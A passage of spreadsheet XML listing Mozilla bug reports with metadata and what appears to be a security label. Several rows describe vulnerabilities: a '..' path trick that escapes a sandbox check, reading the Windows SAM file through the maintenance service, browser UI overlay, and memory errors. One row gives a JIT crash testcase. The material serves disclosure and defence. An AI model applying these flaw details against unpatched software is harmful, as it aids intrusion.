      <c r="V4426" t="n">
        <v>21</v>
      </c>
      <c r="W4426" t="inlineStr">
        <is>
          <t>Per discussion with :baku on IRC, this is a follow up to bug 1344415 "Privilege escalation/Sandbox escape using PFileSystemRequestConstructor". The fix for 1344415 needs to do some additional checks on the paths received from content and used in FileSystemRequestParent::Initialize() before they are passed to FileSystemUtils::IsDescendantPath() to prevent the ".." trick.
Specifically, in the parent, the file picker could be used to select say
  /Users/john/files-to-upload
The child could later send a FileSystemRequestParent request for the path
  /Users/john/files-to-upload/../my-secret-files
And FileSystemUtils::IsDescendantPath would consider the second path to be a descendant of the first which would allow the content process to access files that it should not be allowed to.
The content process sandbox will soon block read access to arbitrary files in the home directory.</t>
        </is>
      </c>
      <c r="X4426" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4427">
      <c r="A4427" t="n">
        <v>1247239</v>
      </c>
      <c r="B4427" t="inlineStr">
        <is>
          <t>2016-02-10 04:28:39 -0800</t>
        </is>
      </c>
      <c r="C4427" t="inlineStr">
        <is>
          <t>moz maintenance service: Ability to read arbitrary files as SYSTEM</t>
        </is>
      </c>
      <c r="D4427" t="inlineStr">
        <is>
          <t>2024-05-30 09:09:24 -0700</t>
        </is>
      </c>
      <c r="E4427" t="n">
        <v>1</v>
      </c>
      <c r="F4427" t="n">
        <v>1</v>
      </c>
      <c r="G4427" t="n">
        <v>3</v>
      </c>
      <c r="H4427" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4427" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4427" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4427" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4427" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4427" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4427" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4427" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main50+]</t>
        </is>
      </c>
      <c r="Q4427" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4427" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4427" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T4427" t="n">
        <v>1</v>
      </c>
      <c r="U4427" t="n">
        <v>0</v>
      </c>
      <c r="V4427" t="n">
        <v>27</v>
      </c>
      <c r="W4427" t="inlineStr">
        <is>
          <t>I noticed the problem is known (Bug 850492) but wasn't fixed because the poc was not working. I have developed a poc which relies on the Volume Snapshot Service of windows to copy locked protected files. I tested the poc with the moz maintenance service at C:\Program Files (x86)\Mozilla Maintenance Service and win7 64 bit. 
If the Volume Snapshot Service is enabled and already a restore point was created (!) the poc is able to copy the C:\Windows\system32\config\SAM file and other protected files.</t>
        </is>
      </c>
      <c r="X4427" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4428">
      <c r="A4428" t="n">
        <v>1884552</v>
      </c>
      <c r="B4428" t="inlineStr">
        <is>
          <t>2024-03-09 22:29:19 -0800</t>
        </is>
      </c>
      <c r="C4428" t="inlineStr">
        <is>
          <t>Assertion failure: ins-&gt;isGoto(), at jit/IonAnalysis.cpp:715</t>
        </is>
      </c>
      <c r="D4428" t="inlineStr">
        <is>
          <t>2024-09-18 19:36:39 -0700</t>
        </is>
      </c>
      <c r="E4428" t="n">
        <v>1</v>
      </c>
      <c r="F4428" t="n">
        <v>1</v>
      </c>
      <c r="G4428" t="n">
        <v>3</v>
      </c>
      <c r="H4428" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4428" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4428" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K4428" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4428" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4428" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4428" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4428" t="inlineStr">
        <is>
          <t>[adv-main125+][adv-esr115.10+]</t>
        </is>
      </c>
      <c r="Q4428" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4428" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S4428" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T4428" t="n">
        <v>1</v>
      </c>
      <c r="U4428" t="n">
        <v>0</v>
      </c>
      <c r="V4428" t="n">
        <v>18</v>
      </c>
      <c r="W4428" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit e23c37371147c5ff5ac7d825ccaa90e096cd036e the attached sample asserts in the js-shell when invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --fuzzing-safe crash.js`.
```
for (let i22 = 0, i23 = 10;
    (() =&gt; {
        for (let i26 = 0, i27 = 10;
            (() =&gt; {
                let v28 = i26 != i27;
                const v29 = v28 === i23;
                if (v29) {
                    v28 = v29;
                } else {
                    switch (this) {
                    }
                }
                return v28;
            })();
            ) {
        }
        return i22 &lt; i23;
    })();
    ) {
}
```
```
#0  0x0000555558fd8d7b in UpdateTestSuccessors (alloc=..., block=0x7ffff569f3f8, value=0x7ffff569eb20, ifTrue=0x7ffff56a0130, 
    ifFalse=0x7ffff56a0b78, existingPred=0x7ffff569fc98) at js/src/jit/IonAnalysis.cpp:715
#1  0x0000555558fd7864 in MaybeFoldDiamondConditionBlock (graph=..., initialBlock=0x7ffff569e2e8)
    at js/src/jit/IonAnalysis.cpp:862
#2  0x0000555558fa8533 in MaybeFoldConditionBlock (graph=..., initialBlock=0x7ffff569e2e8)
    at js/src/jit/IonAnalysis.cpp:1095
#3  0x0000555558fa8475 in js::jit::FoldTests (graph=...) at js/src/jit/IonAnalysis.cpp:1294
#4  0x0000555558ee1af1 in js::jit::OptimizeMIR (mir=0x7ffff569b180) at js/src/jit/Ion.cpp:1037
#5  0x0000555558ee384a in js::jit::CompileBackEnd (mir=0x7ffff569b180, snapshot=0x7ffff569b6a0)
    at js/src/jit/Ion.cpp:1605
#6  0x0000555558fc9287 in js::jit::IonCompileTask::runTask (this=0x7ffff569b718)
    at js/src/jit/IonCompileTask.cpp:52
#7  0x0000555558fc91b6 in js::jit::IonCompileTask::runHelperThreadTask (this=0x7ffff569b718, locked=...)
    at js/src/jit/IonCompileTask.cpp:30
#8  0x0000555557d769d0 in js::GlobalHelperThreadState::runTaskLocked (this=0x7ffff7618400, task=0x7ffff569b718, locked=...)
    at js/src/vm/HelperThreads.cpp:1728
#9  0x0000555557d767ab in js::GlobalHelperThreadState::runOneTask (this=0x7ffff7618400, lock=...)
    at js/src/vm/HelperThreads.cpp:1697
#10 0x0000555557db61c8 in js::HelperThread::threadLoop (this=0x7ffff7627420, pool=0x7ffff7623100)
    at js/src/vm/InternalThreadPool.cpp:282
#11 0x0000555557db6022 in js::HelperThread::ThreadMain (pool=0x7ffff7623100, helper=0x7ffff7627420)
    at js/src/vm/InternalThreadPool.cpp:225
#12 0x0000555557dde732 in js::detail::ThreadTrampoline&lt;void (&amp;)(js::InternalThreadPool*, js::HelperThread*), js::InternalThreadPool*&amp;, js::HelperThread*&gt;::callMain&lt;0ul, 1ul&gt; (this=0x7ffff760f5f0) at js/src/threading/Thread.h:228
#13 0x0000555557dde57b in js::detail::ThreadTrampoline&lt;void (&amp;)(js::InternalThreadPool*, js::HelperThread*), js::InternalThreadPool*&amp;, js::HelperThread*&gt;::Start (aPack=0x7ffff760f5f0) at js/src/threading/Thread.h:217
#14 0x00007ffff7897b5a in start_thread (arg=&lt;optimized out&gt;) at ./nptl/pthread_create.c:444
#15 0x00007ffff79285fc in clone3 () at ../sysdeps/unix/sysv/linux/x86_64/clone3.S:78
```</t>
        </is>
      </c>
      <c r="X4428" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4429">
      <c r="A4429" t="n">
        <v>1701834</v>
      </c>
      <c r="B4429" t="inlineStr">
        <is>
          <t>2021-03-29 17:59:42 -0700</t>
        </is>
      </c>
      <c r="C4429" t="inlineStr">
        <is>
          <t>I'm able to render HTML content on top of Firefox's address bar and tab bar</t>
        </is>
      </c>
      <c r="D4429" t="inlineStr">
        <is>
          <t>2024-05-30 10:29:34 -0700</t>
        </is>
      </c>
      <c r="E4429" t="n">
        <v>1</v>
      </c>
      <c r="F4429" t="n">
        <v>1</v>
      </c>
      <c r="G4429" t="n">
        <v>3</v>
      </c>
      <c r="H4429" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4429" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4429" t="inlineStr">
        <is>
          <t>Graphics: WebRender</t>
        </is>
      </c>
      <c r="K4429" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4429" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4429" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4429" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4429" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][sec-survey][post-critsmash-triage][adv-main88+]</t>
        </is>
      </c>
      <c r="Q4429" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4429" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4429" t="inlineStr">
        <is>
          <t>89 Branch</t>
        </is>
      </c>
      <c r="T4429" t="n">
        <v>1</v>
      </c>
      <c r="U4429" t="n">
        <v>0</v>
      </c>
      <c r="V4429" t="n">
        <v>15</v>
      </c>
      <c r="W4429" t="inlineStr">
        <is>
          <t>I was fiddling around with 3D CSS (e.g. turning on perspective, rendering cubes using CSS) and using JS to abuse this (too many divs) when I discovered that certain cubes in a 10x10x10 block of cubes were appearing above the FireFox webpage viewport.
At first I just thought it was amusing, but I then realised it is an actual security concern as the content can be arbitrary, and could e.g. replace the address bar's default content for someone better at HTML than I.
I have created a simple HTML page (including CSS) which reproduces the issue in current Firefox (87.0 64-bit running on MacOS X High Sierra), and demonstrates that it could be used to render 2D flat content appearing over the 2D flat content of Firefox's own UI. In my test case it simply shows a red square with "Hi" written in it.</t>
        </is>
      </c>
      <c r="X4429" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4430">
      <c r="A4430" t="n">
        <v>937132</v>
      </c>
      <c r="B4430" t="inlineStr">
        <is>
          <t>2013-11-11 07:50:31 -0800</t>
        </is>
      </c>
      <c r="C4430" t="inlineStr">
        <is>
          <t>LifoAlloc missing overflow checks</t>
        </is>
      </c>
      <c r="D4430" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:34 -0800</t>
        </is>
      </c>
      <c r="E4430" t="n">
        <v>1</v>
      </c>
      <c r="F4430" t="n">
        <v>1</v>
      </c>
      <c r="G4430" t="n">
        <v>3</v>
      </c>
      <c r="H4430" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4430" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4430" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4430" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4430" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4430" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4430" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4430" t="inlineStr">
        <is>
          <t>[adv-main27+][adv-esr24.3+][qa-]</t>
        </is>
      </c>
      <c r="Q4430" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4430" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4430" t="inlineStr">
        <is>
          <t>mozilla29</t>
        </is>
      </c>
      <c r="T4430" t="n">
        <v>1</v>
      </c>
      <c r="U4430" t="n">
        <v>0</v>
      </c>
      <c r="V4430" t="n">
        <v>37</v>
      </c>
      <c r="W4430" t="inlineStr">
        <is>
          <t>Created attachment 830194
ds-overflow-check.patch
js/src/ds/LifoAlloc.h contains generic array allocation code which does sizeof(T) * count without checking for overflow.
I have not audited the codebase to determine if this is exploitable. I was just trying to figure out the intended difference between newArray and newArrayUninitialized (and it's still not clear) and noticed this while I was there.</t>
        </is>
      </c>
      <c r="X4430" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4431">
      <c r="A4431" t="n">
        <v>1357946</v>
      </c>
      <c r="B4431" t="inlineStr">
        <is>
          <t>2017-04-19 16:53:56 -0700</t>
        </is>
      </c>
      <c r="C4431" t="inlineStr">
        <is>
          <t>Crash in TabsPayload.Tab.(fromJSON(JSON) -&gt; TabsPayload.Tab?).(getLastUsed #1)(JSON) -&gt; UInt64?</t>
        </is>
      </c>
      <c r="D4431" t="inlineStr">
        <is>
          <t>2017-05-09 08:08:18 -0700</t>
        </is>
      </c>
      <c r="E4431" t="n">
        <v>1</v>
      </c>
      <c r="F4431" t="n">
        <v>1</v>
      </c>
      <c r="G4431" t="n">
        <v>2</v>
      </c>
      <c r="H4431" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4431" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J4431" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4431" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4431" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M4431" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N4431" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4431" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4431" t="inlineStr">
        <is>
          <t>[TopCrasher][MobileCore]</t>
        </is>
      </c>
      <c r="Q4431" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4431" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4431" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4431" t="n">
        <v>1</v>
      </c>
      <c r="U4431" t="n">
        <v>0</v>
      </c>
      <c r="V4431" t="n">
        <v>5</v>
      </c>
      <c r="W4431" t="inlineStr">
        <is>
          <t>The trace is a bit more complex, but the method in the bug summary is high up and has a line number attached.</t>
        </is>
      </c>
      <c r="X4431" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4432">
      <c r="A4432" t="n">
        <v>792305</v>
      </c>
      <c r="B4432" t="inlineStr">
        <is>
          <t>2012-09-18 21:20:58 -0700</t>
        </is>
      </c>
      <c r="C4432" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow in nsWindow::OnExposeEvent</t>
        </is>
      </c>
      <c r="D4432" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:16 -0700</t>
        </is>
      </c>
      <c r="E4432" t="n">
        <v>1</v>
      </c>
      <c r="F4432" t="n">
        <v>1</v>
      </c>
      <c r="G4432" t="n">
        <v>3</v>
      </c>
      <c r="H4432" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4432" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4432" t="inlineStr">
        <is>
          <t>Widget: Gtk</t>
        </is>
      </c>
      <c r="K4432" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4432" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4432" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4432" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4432" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4432" t="inlineStr">
        <is>
          <t>[asan][adv-main18+][adv-esr17+]</t>
        </is>
      </c>
      <c r="Q4432" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4432" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4432" t="inlineStr">
        <is>
          <t>mozilla18</t>
        </is>
      </c>
      <c r="T4432" t="n">
        <v>1</v>
      </c>
      <c r="U4432" t="n">
        <v>0</v>
      </c>
      <c r="V4432" t="n">
        <v>32</v>
      </c>
      <c r="W4432" t="inlineStr">
        <is>
          <t>Reproduces on trunk. Testcase reproduces extremely flakily if i first run firefox with a clean profile (and testcase path on cmd line), then close the firefox completely, and then rerun it again with testcase. Trying to get a minimized testcase. The second-time need might be coming from this line in the testcase
InstallTrigger.install({
    "Unsigned XPI": "http://example.com/browser/toolkit/mozapps/extensions/test/xpinstall/unsigned.xpi"
  });
=================================================================
==12538== ERROR: AddressSanitizer heap-buffer-overflow on address 0x7f0886f066d8 at pc 0x7f08b8658875 bp 0x7fff30d69ab0 sp 0x7fff30d69aa8
READ of size 1 at 0x7f0886f066d8 thread T0
    #0 0x7f08b8658874 in UpdateMaskBits(char*, int, int, nsIntRect const&amp;, unsigned char*, int) widget/gtk2/nsWindow.cpp:4261
    #1 0x7f08b8657a51 in nsWindow::OnExposeEvent(_GdkEventExpose*) widget/gtk2/nsWindow.cpp:2222
    #2 0x7f08b866816e in expose_event_cb(_GtkWidget*, _GdkEventExpose*) widget/gtk2/nsWindow.cpp:5042
0x7f0886f066d8 is located 0 bytes to the right of 5720-byte region [0x7f0886f05080,0x7f0886f066d8)
allocated by thread T0 here:
    #0 0x4343e0 in __interceptor_malloc 
    #1 0x7f08bc70c3a8 in moz_xmalloc memory/mozalloc/mozalloc.cpp:57
    #2 0x7f08b8657a51 in nsWindow::OnExposeEvent(_GdkEventExpose*) widget/gtk2/nsWindow.cpp:2222
    #3 0x7f08b866816e in expose_event_cb(_GtkWidget*, _GdkEventExpose*) widget/gtk2/nsWindow.cpp:5042
Shadow byte and word:
  0x1fe110de0cdb: fb
  0x1fe110de0cd8: 00 00 00 fb fb fb fb fb
More shadow bytes:
  0x1fe110de0cb8: 00 00 00 00 00 00 00 00
  0x1fe110de0cc0: 00 00 00 00 00 00 00 00
  0x1fe110de0cc8: 00 00 00 00 00 00 00 00
  0x1fe110de0cd0: 00 00 00 00 00 00 00 00
=&gt;0x1fe110de0cd8: 00 00 00 fb fb fb fb fb
  0x1fe110de0ce0: fa fa fa fa fa fa fa fa
  0x1fe110de0ce8: fa fa fa fa fa fa fa fa
  0x1fe110de0cf0: fa fa fa fa fa fa fa fa
  0x1fe110de0cf8: fa fa fa fa fa fa fa fa
Stats: 293M malloced (320M for red zones) by 521376 calls
Stats: 41M realloced by 23856 calls
Stats: 248M freed by 255478 calls
Stats: 115M really freed by 96425 calls
Stats: 532M (136284 full pages) mmaped in 133 calls
  mmaps   by size class: 8:376809; 9:49146; 10:20475; 11:14329; 12:4096; 13:2560; 14:1280; 15:256; 16:576; 17:1248; 18:288; 19:40; 20:20;
  mallocs by size class: 8:419076; 9:53870; 10:19196; 11:16732; 12:4893; 13:2792; 14:1719; 15:362; 16:881; 17:1501; 18:294; 19:41; 20:19;
  frees   by size class: 8:178304; 9:39375; 10:14131; 11:13204; 12:3650; 13:2549; 14:1466; 15:306; 16:738; 17:1481; 18:219; 19:39; 20:16;
  rfrees  by size class: 8:64681; 9:13811; 10:3824; 11:9587; 12:1194; 13:844; 14:914; 15:151; 16:412; 17:990; 18:11; 19:5; 20:1;
Stats: malloc large: 1855 small slow: 2608
==12538== ABORTING</t>
        </is>
      </c>
      <c r="X4432" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4433">
      <c r="A4433" t="n">
        <v>1601738</v>
      </c>
      <c r="B4433" t="inlineStr">
        <is>
          <t>2019-12-05 11:17:42 -0800</t>
        </is>
      </c>
      <c r="C4433" t="inlineStr">
        <is>
          <t>ThreadSanitizer: data race [@ JSFunction::trace] vs. [@ nonLazyScript]</t>
        </is>
      </c>
      <c r="D4433" t="inlineStr">
        <is>
          <t>2019-12-12 20:13:26 -0800</t>
        </is>
      </c>
      <c r="E4433" t="n">
        <v>1</v>
      </c>
      <c r="F4433" t="n">
        <v>1</v>
      </c>
      <c r="G4433" t="n">
        <v>3</v>
      </c>
      <c r="H4433" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4433" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4433" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4433" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4433" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4433" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4433" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4433" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4433" t="inlineStr"/>
      <c r="Q4433" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4433" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4433" t="inlineStr">
        <is>
          <t>mozilla73</t>
        </is>
      </c>
      <c r="T4433" t="n">
        <v>1</v>
      </c>
      <c r="U4433" t="n">
        <v>0</v>
      </c>
      <c r="V4433" t="n">
        <v>8</v>
      </c>
      <c r="W4433" t="inlineStr">
        <is>
          <t>The attached crash information was detected while running CI tests with ThreadSanitizer on mozilla-central revision 6989fcd6bab3.
This is a fairly common race in tests and I'm not sure what the impact here is. However, racing between GC and cloning the script sounds like it should at least be investigated further.
### General information about TSan reports
#### Why fix races?
Data races are undefined behavior and can cause crashes as well as correctness issues. Compiler optimizations can cause racy code to have unpredictable and hard-to-reproduce behavior.
#### Rating
If you think this race can cause crashes or correctness issues, it would be great to rate the bug appropriately as P1/P2 and/or indicating this in the bug. This makes it a lot easier for us to assess the actual impact that these reports make and if they are helpful to you.
#### False Positives / Benign Races
Typically, races reported by TSan are not false positives [1], but it is possible that the race is benign. Even in this case it would be nice to come up with a fix if it is easily doable and does not regress performance. Every race that we cannot fix will have to remain on the suppression list and slows down the overall TSan performance. Also note that seemingly benign races can possibly be harmful (also depending on the compiler, optimizations and the architecture) [2][3].
[1] One major exception is the involvement of uninstrumented code from third-party libraries.
[2] http://software.intel.com/en-us/blogs/2013/01/06/benign-data-races-what-could-possibly-go-wrong
[3] How to miscompile programs with "benign" data races: https://www.usenix.org/legacy/events/hotpar11/tech/final_files/Boehm.pdf
#### Suppressing unfixable races
If the bug cannot be fixed, then a runtime suppression needs to be added in `mozglue/build/TsanOptions.cpp`. The suppressions match on the full stack, so it should be picked such that it is unique to this particular race. The bug number of this bug should also be included so we have some documentation on why this suppression was added.</t>
        </is>
      </c>
      <c r="X4433" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4434">
      <c r="A4434" t="n">
        <v>421161</v>
      </c>
      <c r="B4434" t="inlineStr">
        <is>
          <t>2008-03-05 13:16:09 -0800</t>
        </is>
      </c>
      <c r="C4434" t="inlineStr">
        <is>
          <t>no image found</t>
        </is>
      </c>
      <c r="D4434" t="inlineStr">
        <is>
          <t>2011-08-25 09:49:06 -0700</t>
        </is>
      </c>
      <c r="E4434" t="n">
        <v>1</v>
      </c>
      <c r="F4434" t="n">
        <v>1</v>
      </c>
      <c r="G4434" t="n">
        <v>6</v>
      </c>
      <c r="H4434" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4434" t="inlineStr">
        <is>
          <t>Websites Graveyard</t>
        </is>
      </c>
      <c r="J4434" t="inlineStr">
        <is>
          <t>spreadfirefox.com</t>
        </is>
      </c>
      <c r="K4434" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4434" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4434" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4434" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4434" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4434" t="inlineStr"/>
      <c r="Q4434" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4434" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4434" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4434" t="n">
        <v>1</v>
      </c>
      <c r="U4434" t="n">
        <v>0</v>
      </c>
      <c r="V4434" t="n">
        <v>16</v>
      </c>
      <c r="W4434" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12
Build Identifier: spreadfirefox
with firefox it will just show a transparent image "png" on other browsers it will show image with a "x"
found it testing the site in ie with a new account
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
paul  bug or image has the wrong path or not loaded 2 new png images email to you</t>
        </is>
      </c>
      <c r="X4434" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4435">
      <c r="A4435" t="n">
        <v>511289</v>
      </c>
      <c r="B4435" t="inlineStr">
        <is>
          <t>2009-08-18 17:01:53 -0700</t>
        </is>
      </c>
      <c r="C4435" t="inlineStr">
        <is>
          <t>When MobWrite is restarted, data is lost</t>
        </is>
      </c>
      <c r="D4435" t="inlineStr">
        <is>
          <t>2009-08-26 09:37:09 -0700</t>
        </is>
      </c>
      <c r="E4435" t="n">
        <v>1</v>
      </c>
      <c r="F4435" t="n">
        <v>1</v>
      </c>
      <c r="G4435" t="n">
        <v>6</v>
      </c>
      <c r="H4435" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4435" t="inlineStr">
        <is>
          <t>Skywriter Graveyard</t>
        </is>
      </c>
      <c r="J4435" t="inlineStr">
        <is>
          <t>Collaboration</t>
        </is>
      </c>
      <c r="K4435" t="inlineStr">
        <is>
          <t>0.4.1</t>
        </is>
      </c>
      <c r="L4435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4435" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4435" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4435" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4435" t="inlineStr"/>
      <c r="Q4435" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4435" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4435" t="inlineStr">
        <is>
          <t>0.4.2</t>
        </is>
      </c>
      <c r="T4435" t="n">
        <v>1</v>
      </c>
      <c r="U4435" t="n">
        <v>0</v>
      </c>
      <c r="V4435" t="n">
        <v>3</v>
      </c>
      <c r="W4435" t="inlineStr">
        <is>
          <t>Dion and I were collaborating on a document when it appears Kevin's daemon auto-restarted the deadlocked mobwrite.
i immediately lost the contents of the files I was collaborating on with dion. i had saved frequently, so i could retrieve the contents by turning collaboration off and then reloading the file, and then copying this to the clipboard, turning collaboration on (which caused the contents to disappear), and then pasting it in.
this should be fixed such that restarting mobwrite causes no loss of data for the user.</t>
        </is>
      </c>
      <c r="X4435" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4436">
      <c r="A4436" t="n">
        <v>1343453</v>
      </c>
      <c r="B4436" t="inlineStr">
        <is>
          <t>2017-02-28 22:23:29 -0800</t>
        </is>
      </c>
      <c r="C4436" t="inlineStr">
        <is>
          <t>3 public security flaws in libevent, which may affect mozilla products</t>
        </is>
      </c>
      <c r="D4436" t="inlineStr">
        <is>
          <t>2017-10-26 19:12:56 -0700</t>
        </is>
      </c>
      <c r="E4436" t="n">
        <v>1</v>
      </c>
      <c r="F4436" t="n">
        <v>1</v>
      </c>
      <c r="G4436" t="n">
        <v>3</v>
      </c>
      <c r="H4436" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4436" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4436" t="inlineStr">
        <is>
          <t>IPC</t>
        </is>
      </c>
      <c r="K4436" t="inlineStr">
        <is>
          <t>50 Branch</t>
        </is>
      </c>
      <c r="L4436" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4436" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4436" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4436" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4436" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr52.1+][adv-esr45.9+]</t>
        </is>
      </c>
